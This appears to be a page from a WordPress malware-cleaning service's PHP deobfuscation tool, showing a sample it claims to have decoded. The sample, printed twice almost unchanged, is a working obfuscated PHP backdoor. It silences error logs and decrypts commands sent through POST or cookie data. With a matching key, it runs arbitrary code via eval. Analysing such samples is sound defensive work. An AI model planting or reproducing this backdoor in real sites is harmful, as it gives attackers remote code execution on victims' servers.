Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $j5056231 = 265; $GLOBALS['tfa259'] = array(); global $tfa259; $tfa259 = $GLOBALS; $GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0 } (OTv = 5L; ShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7"; $tfa259["zb853b580"] = "chr"; $tfa259["i5695cb"] = "...



Obfuscated php code

<?php $j5056231 = 265;
$GLOBALS['tfa259'] = array();
global $tfa259;
$tfa259 = $GLOBALS;
$GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0
}

(OTv = 5L;
ShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7";

$tfa259["zb853b580"] = "chr";

$tfa259["i5695cb"] = "ord";

$tfa259["wd8d"] = "strlen";

$tfa259["y97692979"] = "define";

$tfa259["id59ec8"] = "defined";

$tfa259["f803d"] = "ini_set";

$tfa259["obe5"] = "serialize";

$tfa259["s21148f"] = "phpversion";

$tfa259["g7f068"] = "unserialize";

$tfa259["qf92d7d0e"] = "base64_decode";

$tfa259["je59e0"] = "set_time_limit";

$tfa259["p56623830"] = "s83ceb3";

$tfa259["ea8143686"] = "pa6885f";

$tfa259["qa480a2"] = $_POST;

$tfa259["v09de2"] = $_COOKIE;

@ini_set("error_log", NULL);

@ini_set("log_errors", 0);

@ini_set("max_execution_time", 0);

@set_time_limit(0);

if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) {

    define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1);

    $tdf3557 = NULL;

    $o631 = NULL;

    $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a";

    global $j046;

    function pa6885f($tdf3557, $j289)

    {

        global $tfa259;

        $se7a15f9 = "";

        for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) {

            for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) {

                $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a]));

            }

        }

        return $se7a15f9;

    }

    function s83ceb3($tdf3557, $j289)

    {

        global $tfa259;

        global $j046;

        return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289);

    }

    foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) {

        $tdf3557 = $r2a770;

        $o631 = $j289;

    }

    if (!$tdf3557) {

        foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) {

            $tdf3557 = $r2a770;

            $o631 = $j289;

        }

    }

    $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631));

    if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) {

        if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) {

            $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]);

            echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d);
        } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) {

            eval($tdf3557[$tfa259['l39c'][15]]);
}

exit;
}

}

Decoded(de-Obfuscated) php code

<?php

$j5056231 = 265;
$GLOBALS['tfa259'] = array();
global $tfa259;
$tfa259 = $GLOBALS;
$GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0\r\n}\r\n\r\n(OTv = 5L;\r\nShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7";
$tfa259["zb853b580"] = "chr";
$tfa259["i5695cb"] = "ord";
$tfa259["wd8d"] = "strlen";
$tfa259["y97692979"] = "define";
$tfa259["id59ec8"] = "defined";
$tfa259["f803d"] = "ini_set";
$tfa259["obe5"] = "serialize";
$tfa259["s21148f"] = "phpversion";
$tfa259["g7f068"] = "unserialize";
$tfa259["qf92d7d0e"] = "base64_decode";
$tfa259["je59e0"] = "set_time_limit";
$tfa259["p56623830"] = "s83ceb3";
$tfa259["ea8143686"] = "pa6885f";
$tfa259["qa480a2"] = $_POST;
$tfa259["v09de2"] = $_COOKIE;
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) {
    define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1);
    $tdf3557 = NULL;
    $o631 = NULL;
    $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a";
    global $j046;
    function pa6885f($tdf3557, $j289)
    {
        global $tfa259;
        $se7a15f9 = "";
        for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) {
            for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) {
                $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a]));
            }
        }
        return $se7a15f9;
    }
    function s83ceb3($tdf3557, $j289)
    {
        global $tfa259;
        global $j046;
        return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289);
    }
    foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) {
        $tdf3557 = $r2a770;
        $o631 = $j289;
    }
    if (!$tdf3557) {
        foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) {
            $tdf3557 = $r2a770;
            $o631 = $j289;
        }
    }
    $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631));
    if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) {
        if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) {
            $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]);
            echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d);
        } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) {
            eval($tdf3557[$tfa259['l39c'][15]]);
        }
        exit;
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.